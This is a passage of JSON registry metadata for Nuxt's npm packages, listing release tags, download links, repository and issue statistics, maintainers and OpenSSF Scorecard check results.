ositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2026-02-13T18:02:57.374Z","dependent_packages_count":7,"downloads":14017,"downloads_period":"last-month","dependent_repos_count":431,"rankings":{"downloads":1.011683773749727,"dependent_repos_count":0.8410620844407249,"dependent_packages_count":2.7080444545623874,"stargazers_count":0.16519994711762306,"forks_count":0.5466428312764772,"docker_downloads_count":1.6186636805636194,"average":1.1485494619517598},"purl":"pkg:npm/%40nuxt/config-edge","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/config-edge","docker_dependents_count":1,"docker_downloads_count":8,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/config-edge","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/config-edge/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs","https://github.com/sponsors/nuxt"],"critical":null,"issue_metadata":{"last_synced_at":"2026-02-13T18:00:30.319Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786776.4495867769,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":588,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.496213224584911,"merged_pull_requests_count":5386,"bot_issues_count":12,"bot_pull_requests_count":2972,"past_year_issues_count":940,"past_year_pull_requests_count":1678,"past_year_avg_time_to_close_issue":711939.6998050682,"past_year_avg_time_to_close_pull_request":221172.79485238457,"past_year_issues_closed_count":513,"past_year_pull_requests_closed_count":1321,"past_year_pull_request_authors_count":141,"past_year_issue_authors_count":674,"past_year_avg_comments_per_issue":2.2457446808510637,"past_year_avg_comments_per_pull_request":3.4153754469606676,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":694,"past_year_merged_pull_requests_count":1175,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":321,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":66,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"BobbieGoede","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"cernymatej","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"DamianGlowala","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"wattanx","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"dargmuesli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fconfig-edge/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fconfig-edge/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fconfig-edge/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fconfig-edge/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fconfig-edge/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fconfig-edge/codemeta","maintainers":[{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-12-13T16:28:35.316Z","updated_at":"2023-12-13T16:28:35.316Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":145752,"name":"@nuxt/kit-edge","ecosystem":"npm","description":"[![Nuxt banner](./.github/assets/banner.svg)](https://nuxt.com)","homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":2003,"first_release_published_at":"2021-07-01T12:51:12.132Z","latest_release_published_at":"2023-03-07T21:13:46.244Z","latest_release_number":"4.0.0-27970394.60d07df4","last_synced_at":"2026-04-01T04:01:51.603Z","created_at":"2022-04-05T15:53:26.511Z","updated_at":"2026-04-01T04:01:51.604Z","registry_url":"https://www.npmjs.com/package/@nuxt/kit-edge","install_command":"npm install @nuxt/kit-edge","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"3.8.0-28284309.b3d3d7f4","pr-20836":"3.6.0-28072625.2e2d8450","pr-20910":"3.5.1-28071980.657d1b01","pr-21066":"3.5.2-28084070.1bb05d83","pr-21450":"3.6.0-28124217.43844474","pr-19403":"3.6.0-28106934.bccf6dd0","pr-21461":"3.6.0-28107353.3fa5f90a","pr-21655":"3.6.0-28121506.bee3dde2","pr-21573":"3.6.0-28121201.45550c5f","pr-21705":"3.6.0-28125223.60c7ae2d","pr-21793":"3.6.3-28155682.16a8312f","pr-22224":"3.7.0-28163062.f38eafa6","pr-22227":"3.6.5-28163125.3d0d7508","pr-21747":"3.7.0-28179135.c12f0f09","pr-22362":"3.7.0-28179877.ea6d5c28","pr-21641":"3.8.0-28246590.5d47cf10","pr-22465":"3.7.0-28184377.9a30357e","pr-22494":"3.7.0-28185860.e8cb8914","pr-22515":"3.7.0-28197383.e0d6624f","pr-23526":"3.8.0-28275051.7cb8d079"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-02-13T11:08:58.000Z","size":134344,"stargazers_count":59568,"open_issues_count":935,"forks_count":5524,"subscribers_count":784,"default_branch":"main","last_synced_at":"2026-02-13T11:29:52.149Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-02-13T11:06:01.000Z","dependencies_parsed_at":"2024-12-25T13:30:54.580Z","dependency_job_id":"22cffcce-6e0a-4001-b86c-b81e60fdf77b","html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":311,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: 